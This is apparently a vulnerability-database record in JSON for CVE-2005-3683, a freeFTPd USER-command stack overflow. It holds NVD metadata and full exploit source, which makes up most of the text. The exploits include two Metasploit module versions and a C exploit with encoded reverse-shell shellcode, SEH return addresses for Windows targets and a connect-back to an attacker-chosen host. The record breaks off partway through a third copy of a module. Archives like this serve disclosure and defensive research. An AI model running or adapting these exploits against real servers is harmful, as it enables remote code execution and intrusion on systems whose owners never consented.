ID CVE-2005-3683Type cveReporter NVDModified 2017-07-10T21:33:16
Description
Stack-based buffer overflow in freeFTPd before 1.0.9 with Logging enabled, allows remote attackers to cause a denial of service (application crash), and possibly execute arbitrary code, via a long USER command.
{"id": "CVE-2005-3683", "bulletinFamily": "NVD", "title": "CVE-2005-3683", "description": "Stack-based buffer overflow in freeFTPd before 1.0.9 with Logging enabled, allows remote attackers to cause a denial of service (application crash), and possibly execute arbitrary code, via a long USER command.", "published": "2005-11-18T20:03:00", "modified": "2017-07-10T21:33:16", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3683", "reporter": "NVD", "references": ["http://marc.info/?l=full-disclosure&m=113216611924774&w=2", "http://securitytracker.com/id?1015230", "http://freeftpd.com/?ctt=changelog", "http://www.securityfocus.com/bid/15457", "https://exchange.xforce.ibmcloud.com/vulnerabilities/23118", "http://www.vupen.com/english/advisories/2005/2458", "http://marc.info/?l=full-disclosure&m=113213763821294&w=2"], "cvelist": ["CVE-2005-3683"], "type": "cve", "lastseen": "2017-07-11T11:15:02", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:freeftpd:freeftpd:1.0.2", "cpe:/a:freeftpd:freeftpd:1.0.7", "cpe:/a:freeftpd:freeftpd:1.0", "cpe:/a:freeftpd:freeftpd:1.0.3", "cpe:/a:freeftpd:freeftpd:1.0.6", "cpe:/a:freeftpd:freeftpd:1.0.4", "cpe:/a:freeftpd:freeftpd:1.0.8", "cpe:/a:freeftpd:freeftpd:1.0.5", "cpe:/a:freeftpd:freeftpd:1.0.1"], "cvelist": ["CVE-2005-3683"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Stack-based buffer overflow in freeFTPd before 1.0.9 with Logging enabled, allows remote attackers to cause a denial of service (application crash), and possibly execute arbitrary code, via a long USER command.", "edition": 2, "enchantments": {}, "hash": "d4e01fd8c4b43cd772f3350eae0e07ad72058d65709a11089f6749124e31d5e7", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "5d5c6a704bef38b352fbf1c8982bbe4d", "key": "cpe"}, {"hash": "270c892ba9a8af6651f6c6189799140d", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "7cd6df361ed753ee902b617af5506757", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "589cc83b0398e2bffb8f27e3ef395fc0", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "761374e4d4d41abb1f9bde059b6d1d97", "key": "references"}, {"hash": "9bedc34e05fd1a2cf0d42ec6cdcc68ca", "key": "description"}, {"hash": "2033fc6670542d50baeeb4a9edeb2fc7", "key": "href"}, {"hash": "53a165c72545495b70e2be0ecffbcce6", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3683", "id": "CVE-2005-3683", "lastseen": "2017-04-18T15:51:39", "modified": "2016-10-17T23:36:52", "objectVersion": "1.2", "published": "2005-11-18T20:03:00", "references": ["http://marc.info/?l=full-disclosure&m=113216611924774&w=2", "http://securitytracker.com/id?1015230", "http://xforce.iss.net/xforce/xfdb/23118", "http://freeftpd.com/?ctt=changelog", "http://www.securityfocus.com/bid/15457", "http://www.vupen.com/english/advisories/2005/2458", "http://marc.info/?l=full-disclosure&m=113213763821294&w=2"], "reporter": "NVD", "scanner": [], "title": "CVE-2005-3683", "type": "cve", "viewCount": 1}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-04-18T15:51:39"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:freeftpd:freeftpd:1.0.2", "cpe:/a:freeftpd:freeftpd:1.0.7", "cpe:/a:freeftpd:freeftpd:1.0", "cpe:/a:freeftpd:freeftpd:1.0.3", "cpe:/a:freeftpd:freeftpd:1.0.6", "cpe:/a:freeftpd:freeftpd:1.0.4", "cpe:/a:freeftpd:freeftpd:1.0.8", "cpe:/a:freeftpd:freeftpd:1.0.5", "cpe:/a:freeftpd:freeftpd:1.0.1"], "cvelist": ["CVE-2005-3683"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Stack-based buffer overflow in freeFTPd before 1.0.9 with Logging enabled, allows remote attackers to cause a denial of service (application crash), and possibly execute arbitrary code, via a long USER command.", "edition": 1, "hash": "00720d013b37652b0e894c8b976a5dc755007d11fd21dbe967cc6daed59db234", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "5d5c6a704bef38b352fbf1c8982bbe4d", "key": "cpe"}, {"hash": "270c892ba9a8af6651f6c6189799140d", "key": "published"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "7cd6df361ed753ee902b617af5506757", "key": "title"}, {"hash": "2363628bb6da755034814ae4da4325b5", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "589cc83b0398e2bffb8f27e3ef395fc0", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9bedc34e05fd1a2cf0d42ec6cdcc68ca", "key": "description"}, {"hash": "fa155544523480058a7ed85d79da9565", "key": "modified"}, {"hash": "2033fc6670542d50baeeb4a9edeb2fc7", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3683", "id": "CVE-2005-3683", "lastseen": "2016-09-03T05:59:51", "modified": "2011-03-07T21:26:58", "objectVersion": "1.2", "published": "2005-11-18T20:03:00", "references": ["http://marc.theaimsgroup.com/?l=full-disclosure&m=113213763821294&w=2", "http://securitytracker.com/id?1015230", "http://xforce.iss.net/xforce/xfdb/23118", "http://freeftpd.com/?ctt=changelog", "http://www.securityfocus.com/bid/15457", "http://www.vupen.com/english/advisories/2005/2458", "http://marc.theaimsgroup.com/?l=full-disclosure&m=113216611924774&w=2"], "reporter": "NVD", "scanner": [], "title": "CVE-2005-3683", "type": "cve", "viewCount": 1}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T05:59:51"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "5d5c6a704bef38b352fbf1c8982bbe4d"}, {"key": "cvelist", "hash": "589cc83b0398e2bffb8f27e3ef395fc0"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "9bedc34e05fd1a2cf0d42ec6cdcc68ca"}, {"key": "href", "hash": "2033fc6670542d50baeeb4a9edeb2fc7"}, {"key": "modified", "hash": "75aa8219f31571810ad605985bfbf265"}, {"key": "published", "hash": "270c892ba9a8af6651f6c6189799140d"}, {"key": "references", "hash": "14eeb6c5eb13c0ade229a88d7d780836"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "7cd6df361ed753ee902b617af5506757"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "e49928364ba9bd033397ae99c74bf34e658c4a17d16e438b2be725530fa1d187", "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-07-11T11:15:02"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:16707", "EDB-ID:1330"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/FREEFTPD_USER"]}, {"type": "saint", "idList": ["SAINT:3C63B2AD63630BFDDCA758E4396799B8", "SAINT:5C641AAB1A13783356628966CEFE2C4E", "SAINT:E52A832DC65BDA990CC0CB6C5E90106D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83039"]}, {"type": "osvdb", "idList": ["OSVDB:20909"]}], "modified": "2017-07-11T11:15:02"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:freeftpd:freeftpd:1.0.2", "cpe:/a:freeftpd:freeftpd:1.0.7", "cpe:/a:freeftpd:freeftpd:1.0", "cpe:/a:freeftpd:freeftpd:1.0.3", "cpe:/a:freeftpd:freeftpd:1.0.6", "cpe:/a:freeftpd:freeftpd:1.0.4", "cpe:/a:freeftpd:freeftpd:1.0.8", "cpe:/a:freeftpd:freeftpd:1.0.5", "cpe:/a:freeftpd:freeftpd:1.0.1"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-02-02T06:19:10", "bulletinFamily": "exploit", "description": "freeFTPd 1.0 Username Overflow. CVE-2005-3683. Remote exploit for windows platform", "modified": "2010-07-03T00:00:00", "published": "2010-07-03T00:00:00", "id": "EDB-ID:16707", "href": "https://www.exploit-db.com/exploits/16707/", "type": "exploitdb", "title": "freeFTPd 1.0 Username Overflow", "sourceData": "##\r\n# $Id: freeftpd_user.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'freeFTPd 1.0 Username Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the freeFTPd\r\n\t\t\t\tmulti-protocol file transfer service. This flaw can only be\r\n\t\t\t\texploited when logging has been enabled (non-default).\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9669 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-3683'],\r\n\t\t\t\t\t[ 'OSVDB', '20909'],\r\n\t\t\t\t\t[ 'BID', '15457'],\r\n\t\t\t\t\t[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x20\\x0a\\x0d\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows 2000 English ALL',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x75022ac4,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows XP Pro SP0/SP1 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x71aa32ad,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows NT SP5/SP6a English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x776a1799,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows 2003 Server English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x7ffc0638,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Nov 16 2005'\r\n\t\t))\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tdisconnect\r\n\t\tif (banner =~ /freeFTPd 1\\.0/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tbuf = rand_text_english(1816, payload_badchars)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tbuf[1008, seh.length] = seh\r\n\r\n\t\tsend_cmd( ['USER', buf] , false)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16707/"}, {"lastseen": "2016-01-31T14:01:06", "bulletinFamily": "exploit", "description": "FreeFTPD <= 1.0.8 (USER) Remote Buffer Overflow Exploit. CVE-2005-3683,CVE-2005-3684. Remote exploit for windows platform", "modified": "2005-11-17T00:00:00", "published": "2005-11-17T00:00:00", "id": "EDB-ID:1330", "href": "https://www.exploit-db.com/exploits/1330/", "type": "exploitdb", "title": "FreeFTPD <= 1.0.8 USER Remote Buffer Overflow Exploit", "sourceData": "/*\r\n _______ ________ .__ _____ __\r\n___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __\r\n\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ /\r\n > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| <\r\n/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\\r\n \\/ \\/ \\/ \\/ 26\\09\\05 \\/ |__| \\/ \\/\r\n\r\n[i] Title: FreeFTPD Remote USER Buffer overflow\r\n[i] Discovered by: barabas [mutsonline]\r\n[i] Exploit by: Expanders\r\n\r\n[ Why FTPD crash? ]\r\n\r\nWhen logging option is enabled freeftpd copy the user and the pass supplied by the user in the memory before put it in a logfile.\r\n\r\n----Code Snippet----\r\n78001D5D MOV ECX,DWORD PTR SS:[ESP+4] Ftpd put in ECX SP+4 that point to the user supplied data.\r\n--------------------\r\n\r\n\r\nIf attacker's username is too big for the size of the buffer first we go to overwrite SEH handler(1011 bytes) and then the stack itself.\r\n\r\nBeacuse stack point to our buffer this code\r\n\r\n----Code Snippet----\r\n78001D90 MOV EAX,DWORD PTR DS:[ECX]\r\n--------------------\r\n\r\nwill cause an access violation.\r\n\r\nCode Execution is possible.\r\n\r\n[ Timeline ]\r\n\r\nThis vulnerability was not comunicated to the author.\r\n\r\n[ Links ]\r\n\r\nwww.x0n3-h4ck.org\r\n\r\n\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n\r\n#define BUGSTR \"USER %s \\r\\nPASS x0ned\\r\\n\" // Command where bug reside\r\n#define BUFFSIZE 2000 // Buffer size\r\n\r\nint banner();\r\nint usage(char *filename);\r\nint inject(char *port, char *ip);\r\nint remote_connect( char* ip, unsigned short port );\r\n\r\n\r\n/* win32_reverse - EXITFUNC=seh LHOST=0.0.0.0 LPORT=0 Size=312 Encoder=Pex http://metasploit.com */\r\nchar shellcode[] =\r\n\"\\x2b\\xc9\\x83\\xe9\\xb8\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\xcf\"\r\n\"\\xfd\\x4a\\x2d\\x83\\xee\\xfc\\xe2\\xf4\\x33\\x97\\xa1\\x60\\x27\\x04\\xb5\\xd2\"\r\n\"\\x30\\x9d\\xc1\\x41\\xeb\\xd9\\xc1\\x68\\xf3\\x76\\x36\\x28\\xb7\\xfc\\xa5\\xa6\"\r\n\"\\x80\\xe5\\xc1\\x72\\xef\\xfc\\xa1\\x64\\x44\\xc9\\xc1\\x2c\\x21\\xcc\\x8a\\xb4\"\r\n\"\\x63\\x79\\x8a\\x59\\xc8\\x3c\\x80\\x20\\xce\\x3f\\xa1\\xd9\\xf4\\xa9\\x6e\\x05\"\r\n\"\\xba\\x18\\xc1\\x72\\xeb\\xfc\\xa1\\x4b\\x44\\xf1\\x01\\xa6\\x90\\xe1\\x4b\\xc6\"\r\n\"\\xcc\\xd1\\xc1\\xa4\\xa3\\xd9\\x56\\x4c\\x0c\\xcc\\x91\\x49\\x44\\xbe\\x7a\\xa6\"\r\n\"\\x8f\\xf1\\xc1\\x5d\\xd3\\x50\\xc1\\x6d\\xc7\\xa3\\x22\\xa3\\x81\\xf3\\xa6\\x7d\"\r\n\"\\x30\\x2b\\x2c\\x7e\\xa9\\x95\\x79\\x1f\\xa7\\x8a\\x39\\x1f\\x90\\xa9\\xb5\\xfd\"\r\n\"\\xa7\\x36\\xa7\\xd1\\xf4\\xad\\xb5\\xfb\\x90\\x74\\xaf\\x4b\\x4e\\x10\\x42\\x2f\"\r\n\"\\x9a\\x97\\x48\\xd2\\x1f\\x95\\x93\\x24\\x3a\\x50\\x1d\\xd2\\x19\\xae\\x19\\x7e\"\r\n\"\\x9c\\xbe\\x19\\x6e\\x9c\\x02\\x9a\\x45\"\r\n\r\n\"\\x00\\x00\\x00\\x00\" // IP\r\n\r\n\"\\xa9\\x95\"\r\n\r\n\"\\x00\\x00\" // PORT\r\n\"\\xa9\\xae\\xc3\\xcc\\x5a\\x95\\xa6\\xd4\\x65\\x9d\\x1d\\xd2\\x19\\x97\\x5a\\x7c\"\r\n\"\\x9a\\x02\\x9a\\x4b\\xa5\\x99\\x2c\\x45\\xac\\x90\\x20\\x7d\\x96\\xd4\\x86\\xa4\"\r\n\"\\x28\\x97\\x0e\\xa4\\x2d\\xcc\\x8a\\xde\\x65\\x68\\xc3\\xd0\\x31\\xbf\\x67\\xd3\"\r\n\"\\x8d\\xd1\\xc7\\x57\\xf7\\x56\\xe1\\x86\\xa7\\x8f\\xb4\\x9e\\xd9\\x02\\x3f\\x05\"\r\n\"\\x30\\x2b\\x11\\x7a\\x9d\\xac\\x1b\\x7c\\xa5\\xfc\\x1b\\x7c\\x9a\\xac\\xb5\\xfd\"\r\n\"\\xa7\\x50\\x93\\x28\\x01\\xae\\xb5\\xfb\\xa5\\x02\\xb5\\x1a\\x30\\x2d\\x22\\xca\"\r\n\"\\xb6\\x3b\\x33\\xd2\\xba\\xf9\\xb5\\xfb\\x30\\x8a\\xb6\\xd2\\x1f\\x95\\xba\\xa7\"\r\n\"\\xcb\\xa2\\x19\\xd2\\x19\\x02\\x9a\\x2d\";\r\n\r\nchar jmpback[]=\r\n//22 byte xor decoder (0x55)\r\n\"\\xEB\\x0F\\x5B\\x33\\xC9\\x66\\x83\\xE9\\xE0\\x80\\x33\\x55\\x43\\xE2\\xFA\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\\xFF\"\r\n//(20 byte jump-back code -> springt 256 + 256 + 64 bytes terug)\r\n\"\\x8C\\xBB\\x8C\\x21\\x71\\xA1\\x0C\\xD5\\x94\\x5F\\xC5\\xAB\\x98\\xAB\\x98\\xD5\\xBC\\x15\\xAA\\xB4\";\r\n\r\nchar jmpover[]=\r\n// 2 bytes jump 4 bytes over - 2 bytes NOP\r\n\"\\xEb\\x04\\x90\\x90\";\r\n\r\nstruct retcodes{char *platform;unsigned long addr;} targets[]= {\r\n { \"Windows NT SP 5/6\" , 0x776a1082 }, // ws2help.dll pop esi, pop ebx, retn [Tnx to metasploit]\r\n\t{ \"Windows 2k Universal\", 0x750211a9 }, // ws2help.dll pop ebp, pop ebx, retn [Tnx to metasploit]\r\n\t{ \"Windows XP SP 1/2\" , 0x71aa13d6 }, // ws2help.dll pop ebx, pop ebp, retn [Tnx to metasploit]\r\n\t{ NULL }\r\n};\r\nint banner() {\r\n printf(\"\\n _______ ________ .__ _____ __ \\n\");\r\n printf(\"___ __\\\\ _ \\\\ ____ \\\\_____ \\\\ | |__ / | | ____ | | __ \\n\");\r\n printf(\"\\\\ \\\\/ / /_\\\\ \\\\ / \\\\ _(__ < ______ | | \\\\ / | |__/ ___\\\\| |/ / \\n\");\r\n printf(\" > <\\\\ \\\\_/ \\\\ | \\\\/ \\\\ /_____/ | Y \\\\/ ^ /\\\\ \\\\___| < \\n\");\r\n printf(\"/__/\\\\_ \\\\\\\\_____ /___| /______ / |___| /\\\\____ | \\\\___ >__|_ \\\\ \\n\");\r\n printf(\" \\\\/ \\\\/ \\\\/ \\\\/ \\\\/ |__| \\\\/ \\\\/ \\n\\n\");\r\n printf(\"[i] Title: \\tFreeFTPD Remote USER Buffer overflow\\n\");\r\n printf(\"[i] Discovered by:\\tbarabas [mutsonline]\\n\");\r\n printf(\"[i] Exploit by: \\tExpanders\\n\\n\");\r\n return 0;\r\n}\r\n\r\nint usage(char *filename) {\r\n int i;\r\n printf(\"Usage: \\t%s <host> <port> <l_ip> <l_port> <targ>\\n\\n\",filename);\r\n printf(\" \\t<host> : Victim's host\\n\");\r\n printf(\" \\t<port> : Victim's port :: Default: 21\\n\");\r\n printf(\" \\t<l_ip> : Local ip address for connectback\\n\");\r\n printf(\" \\t<l_port> : Local port for connectback\\n\");\r\n printf(\" \\t<targ> : Target from the list below\\n\\n\");\r\n \r\n printf(\"# \\t Platform\\n\");\r\n printf(\"-----------------------------------------------\\n\");\r\n for(i = 0; targets[i].platform; i++)\r\n printf(\"%d \\t %s\\n\",i,targets[i].platform);\r\n printf(\"-----------------------------------------------\\n\");\r\n exit(0);\r\n}\r\n\r\nint inject(char *port, char *ip)\r\n{\r\n unsigned long xorip;\r\n unsigned short xorport;\r\n xorip = inet_addr(ip)^(unsigned long)0x2D4AFDCF;\r\n xorport = htons(atoi( port ))^(unsigned short)0x2D4A;\r\n memcpy ( &shellcode[184], &xorip, 4);\r\n memcpy ( &shellcode[190], &xorport, 2);\r\n return 0;\r\n}\r\n\r\nint remote_connect( char* ip, unsigned short port )\r\n{\r\n int s;\r\n struct sockaddr_in remote_addr;\r\n struct hostent* host_addr;\r\n\r\n memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );\r\n if ( ( host_addr = gethostbyname ( ip ) ) == NULL )\r\n {\r\n printf ( \"[X] Cannot resolve \\\"%s\\\"\\n\", ip );\r\n exit ( 1 );\r\n }\r\n remote_addr.sin_family = AF_INET;\r\n remote_addr.sin_port = htons ( port );\r\n remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );\r\n if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )\r\n {\r\n printf ( \"[X] Socket failed!\\n\" );\r\n exit ( 1 );\r\n }\r\n if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )\r\n {\r\n printf ( \"[X] Failed connecting!\\n\" );\r\n exit ( 1 );\r\n }\r\n return ( s );\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n int s,position;\r\n unsigned int rcv;\r\n char *buffer,*request;\r\n char recvbuf[256];\r\n banner();\r\n if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )\r\n usage(argv[0]);\r\n position = 0;\r\n printf(\"[+] Creating evil buffer\\n\");\r\n buffer = (char *) malloc(BUFFSIZE);\r\n request = (char *) malloc(BUFFSIZE + strlen(BUGSTR)); // +3 == \\r + \\n + 0x00\r\n memset(buffer,0x90,BUFFSIZE); // Fill with nops\r\n\r\n inject(argv[4],argv[3]); // Xor port and ip and put them into the shellcode\r\n\r\n position = 1007 - (strlen(shellcode) + 100); // 1007 : Pointer to next Execption structure 100: divide spaces\r\n memcpy(buffer+position,shellcode,strlen(shellcode));\r\n position += strlen(shellcode)+100;\r\n position += 2; // 2 bytes more nops\r\n memcpy(buffer+position,jmpover,2);\r\n position += 2;\r\n memcpy(buffer+position,&targets[atoi(argv[5])].addr,4);\r\n position += 4;\r\n position += 8; // 8 bytes more nops\r\n memcpy(buffer+position,jmpback,strlen(jmpback));\r\n position += strlen(jmpback);\r\n position += 8; // 8 bytes more nops\r\n memset(buffer+position,0x00,1); // End\r\n\r\n\r\n sprintf(request,BUGSTR,buffer);\r\n printf(\"[+] Connecting to remote host\\n\");\r\n s = remote_connect(argv[1],atoi(argv[2]));\r\n rcv=recv(s,recvbuf,256,0);\r\n if(rcv<0)\r\n {\r\n printf(\"\\n[X] Error while recieving banner!\\n\");\r\n close_exit();\r\n }\r\n if (strstr(recvbuf,\"freeFTPd\")!=0)\r\n {\r\n sleep(1);\r\n printf(\"[+] Sending %d bytes of painfull buffer\\n\",strlen(buffer));\r\n if ( send ( s, request, strlen (request), 0) <= 0 )\r\n {\r\n printf(\"[X] Failed to send buffer\\n\");\r\n exit ( 1 );\r\n }\r\n printf(\"[+] Done - Wait for shell on port %s\\n\",argv[4]);\r\n } else\r\n printf(\"[X] This server is not running freeFTPd\\n\");\r\n close(s);\r\n free(buffer);\r\n buffer = NULL;\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2005-11-17]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1330/"}], "metasploit": [{"lastseen": "2018-09-23T21:27:13", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in the freeFTPd multi-protocol file transfer service. This flaw can only be exploited when logging has been enabled (non-default).", "modified": "2017-07-24T13:26:21", "published": "2006-01-08T14:27:59", "id": "MSF:EXPLOIT/WINDOWS/FTP/FREEFTPD_USER", "href": "", "type": "metasploit", "title": "freeFTPd 1.0 Username Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'freeFTPd 1.0 Username Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the freeFTPd\n multi-protocol file transfer service. This flaw can only be\n exploited when logging has been enabled (non-default).\n },\n 'Author' => 'MC',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-3683'],\n [ 'OSVDB', '20909'],\n [ 'BID', '15457']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x20\\x0a\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n [\n 'Windows 2000 English ALL',\n {\n 'Platform' => 'win',\n 'Ret' => 0x75022ac4,\n },\n ],\n [\n 'Windows XP Pro SP0/SP1 English',\n {\n 'Platform' => 'win',\n 'Ret' => 0x71aa32ad,\n },\n ],\n [\n 'Windows NT SP5/SP6a English',\n {\n 'Platform' => 'win',\n 'Ret' => 0x776a1799,\n },\n ],\n [\n 'Windows 2003 Server English',\n {\n 'Platform' => 'win',\n 'Ret' => 0x7ffc0638,\n },\n ],\n ],\n 'DisclosureDate' => 'Nov 16 2005'\n ))\n end\n\n def check\n connect\n disconnect\n if (banner =~ /freeFTPd 1\\.0/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n print_status(\"Trying target #{target.name}...\")\n\n buf = rand_text_english(1816, payload_badchars)\n seh = generate_seh_payload(target.ret)\n buf[1008, seh.length] = seh\n\n send_cmd( ['USER', buf] , false)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/ftp/freeftpd_user.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:22:00", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83039/freeFTPd-1.0-Username-Overflow.html", "id": "PACKETSTORM:83039", "type": "packetstorm", "title": "freeFTPd 1.0 Username Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Ftp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' 